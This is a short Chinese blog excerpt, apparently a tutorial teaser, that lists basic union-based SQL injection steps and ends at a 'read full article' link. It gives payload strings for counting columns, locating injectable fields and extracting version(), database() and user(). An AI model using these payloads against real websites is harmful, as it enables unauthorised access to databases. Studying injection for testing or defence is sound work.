cn三少nginx

摘要： 注入利用解析： 暴字段长度：order by num/* 匹配字段：and 1=1 union select 1,2,3,4,5…….n/* 暴字段位置：and 1=2 union select 1,2,3,4,5…..n/* 利用内置函数暴数据库信息：version()、database()、user() 不用猜解可用字段暴数据库信息(某些网站可能不适用)：and 1=2 union all select version() /*，and 1=2 union all select database() /*，and 1=2 union all select user() /* 操... 阅读全文